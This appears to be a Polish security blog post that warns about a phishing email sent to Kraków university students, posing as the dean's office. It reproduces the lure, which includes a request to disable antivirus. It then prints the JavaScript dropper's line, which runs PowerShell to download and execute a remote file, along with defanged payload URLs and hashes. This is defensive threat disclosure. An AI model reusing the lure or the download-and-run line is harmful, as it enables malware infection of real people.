20:30
13/2/2017

Advertisement

Od jednego z czytelników otrzymaliśmy treść wiadomości jaka została dziś rozesłana do bliżej niesprecyzowanej grupy osób (wiemy o ofierze z Uniwersytetu Rolniczego w Krakowie). Poniżej publikujemy treść fałszywej wiadomości:

Subject: Przypomnienie!! – weryfikacja danych na liście studentów
From: Dziekanat dziekanat.kierownik@opoczta.pl
To: dziekanat.kierownik@opoczta.pl dziekanat.kierownik@opoczta.pl
Date: Sat, 11 Feb 2017

Szanowni Państwo,
większość z Państwa jeszcze tego nie zrobiła, więc jeszcze raz proszę o sprawdzenie i zweryfikowanie swoich danych wpisanych na listę studentów na rok akademicki 2016/2017. W przypadku niezgodności danych z rzeczywistością proszę o ich korektę. Poniżej załączam link do pobrania listy studentów z uczelnianego serwera.
Pobierz listę
Jako, że jest to program wczytujący dane z przeglądarki może zostać potraktowany przez niektóre programy antywirusowe jako zagrożenie, należy wtedy dezaktywować program na czas działania programu.
Jeśli pliku nie uda się otworzyć pomimo tego, oznacza to, że Państwa e-mail na który są Państwo zalogowani w przeglądarce nie pasują do żadnego wymienionego na liście, a w związku z tym problem Państwa nie dotyczy.

Jak widzicie, socjotechnika na “najwyższym poziomie” ;-) Słowa “Pobierz listę” są podlinkowane do następującego URL:

hxxps://www.dropbox.com/s/tl1y6f1iqtylq4d/2050e03ca119580f74cca14cc6e97462.js?dl=1

z którego pobierany jest plik .js o nazwie:

2050e03ca119580f74cca14cc6e97462.js

MD5 a76464cd01561e11a835236b7590ead5
SHA1 04a7cb33b9a56d5da2d601448cc2aa03f62c7b82

Plik jest rozpoznawany przez 6/54 antywirusy i zawiera następującą instrukcję:

var d=new ActiveXObject('Shell.KEYLGApplication'.replace('KEYLG',''));d.ShellExecute("PowerShell","(New-Object System.Net.WebClient).DownloadFile('LINK','Desktop.bat');Start-Process 'Desktop.bat'","","",0);

LINK to następujący URL:

hxxp://downloadfilenow.website/gateway.php?
download=ZjM5NjVmNDg4MTk5ZGNlMjU1MjUyZTE2YzZj
NGE4ZTU4NWVhMTQyNzQ_YzUwZWQ5NjQ3OGU1ZjVlMjg2M
mIxMGVhOTk_ZTMwYjMyYzRlMjkyOGUyMzFlNTIxZDg5ZW
U1ZTljODAwZThlN2Q4NGVjOWQ2M2M2OGI_YTExOWU1ZTd
mYzZjZGIzNzM4NzM1NDgyM2E3MTdkZDA2MWI3NWUwMzM5
NGRlN2FhMTljZTM_NDg4MDc_NDM1YjlkZjc3Y2Zj

który pobiera trojana, wykrywanego przez 9/55 antywirusów:

2050e03ca119580f74cca14cc6e97462.exe

MD5 e41d2dc76e16fdc6ea1e8cd753a77f85
SHA1 13e469d1d2c1fbb1211489e0449b964ffb0f5f89

Po uruchomieniu, malware dociąga kolejną binarkę:

hxxp://mypanel.website/panel/admin/download/pwd.exe

MD5 f6421a4f570656ada4a6c953bdd3c342
SHA1 6571ad4133ca7425d2cfb4d36c65f7aebe13ed94

Ta jest już doskonale znana antywirusom od 2016 roku.

Atak wygląda na dość mocno sprofilowany, ale niezaawansowany, zbudowany w oparciu o gotowe narzędzia. Jeśli ktoś z Was był odbiorcą niniejszego e-maila, dajcie nam znać. Z chęcią dowiemy się kto poza studentami Uniwersytetu Rolniczego w Krakowie znajdował się w grupie odbiorców niniejszej wiadomości.

Przeczytaj także:

Ten wpis pochodzi z naszego linkbloga *ptr, dlatego nie widać go na głównej.
*ptr możesz czytać przez RSS albo przez sidebar po prawej stronie serwisu.

12 komentarzy

Dodaj komentarz
  1. U nas by taki numer nie przeszedł, wszystkie listy są co najwyżej wywieszane na tablicy przy dziekanacie. Pozdrawiam z pierwszego wydziału w rankingu perspektyw IT 2016 ;)

    • Low-tech approach to security ? Szanuję :)

    • @Denat. Czasami dobrze być zacofanym ;).

    • Czasami dobrze mieć Eresa :)

      Ściślej: listy wiszą przy nieczynnych w zimie schodach za gabinetem dziekana ds. nauczania :)

  2. Wydział Informatyki Stosowanej UJ ??

  3. @Denat, szewc bez butów chodzi. ;)

  4. Jak znam studentów, to większość się nabierze.

  5. Grubymi nićmi szyte, ale plus za poprawność językową. Akurat na poziomie dziekanatowym.

  6. Nie wystarczyłoby, żeby podpisywali maile GnuPG?

    • https://xkcd.com/1181/
      Musiałem.

    • To Microsoft zaczął dodawać do Outlooka GnupG? Nie wiedziałem… xD

      W Androidzie, w googlowym kliencie IMAP i większości innych też GnuPG nie odpalisz, wyjątkiem jest chyba tylko K9Mail.

      Reasumując, nawet jeśli jakiś student wie o istnieniu GnuPG (co już jest dosyć rzadkim zjawiskiem), to i tak nie ma zbyt wielu okazji, żeby taki podpis zweryfikować.

      To by było na tyle

    • Standardem jest S/MIME, teraz w O365 można podpisywać/szyfrować pocztę nawet w webmailu :)

      Różnica między standardem S/MIME a PGP i pochodnymi jest fundamentalna, bo standard korzysta z kryptografii poświadczanej przez zaufane CA, a PGP i pochodne działają z kluczem “własnym” podpisującego, bez uwierzytelniania na poziomie osoby.

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: